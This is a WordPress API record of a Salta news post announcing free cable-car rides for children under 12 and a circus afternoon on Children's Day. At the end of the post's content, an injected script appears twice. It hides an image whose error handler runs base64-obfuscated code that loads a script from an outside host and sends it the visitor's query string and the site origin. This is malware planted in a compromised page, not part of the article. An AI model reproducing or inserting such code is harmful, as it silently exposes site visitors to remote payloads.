{"id":4309,"date":"2024-08-15T10:40:14","date_gmt":"2024-08-15T13:40:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4309"},"modified":"2025-08-13T23:50:37","modified_gmt":"2025-08-14T02:50:37","slug":"el-teleferico-san-bernardo-sera-gratuito-para-menores-por-el-dia-de-las-infancias","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4309","title":{"rendered":"El Telef\u00e9rico San Bernardo ser\u00e1 gratuito para menores por el D\u00eda de las Infancias"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-fdeffd1c5610e8bc98d8471d23312921\" style=\"background-color:#634901\"><em>Los m\u00e1s peque\u00f1os podr\u00e1n disfrutar de una tarde de circo en la cima del cerro, en una jornada colmada de juegos, sorpresas y mucha diversi\u00f3n.<\/em><\/h3>\n\n\n\n<p>Telef\u00e9rico San Bernardo invita a pasar una tarde muy especial para celebrar el D\u00eda de las Infancias con una propuesta de circo para el disfrute de los m\u00e1s chicos. La cita ser\u00e1 el domingo 18 de agosto de 15 a 16.<\/p>\n\n\n\n<p>En la cima del cerro San Bernardo se vivir\u00e1 una jornada de magia, acrobacias, malabares, juegos, sorpresas y mucha diversi\u00f3n.<\/p>\n\n\n\n<p>Cabe destacar que la entrada para subir en g\u00f3ndola ser\u00e1 gratuita para los ni\u00f1os menores de 12 a\u00f1os, mientras que sigue disponible el 2&#215;1 para los mayores salte\u00f1os (tarifa provincial adultos).&nbsp;<\/p>\n\n\n\n<p>Desde el Telef\u00e9rico recuerdan que cada cuatro ni\u00f1os deber\u00e1 acompa\u00f1ar en el viaje un adulto responsable.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los m\u00e1s peque\u00f1os podr\u00e1n disfrutar de una tarde de circo en la cima del cerro, en una jornada colmada de juegos, sorpresas y mucha diversi\u00f3n. Telef\u00e9rico San Bernardo invita a pasar una tarde muy especial para celebrar el D\u00eda de las Infancias con una propuesta de circo para el disfrute de los m\u00e1s chicos. La [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4310,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-4309","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4309"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4309"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4309\/revisions"}],"predecessor-version":[{"id":6710,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4309\/revisions\/6710"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4310"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}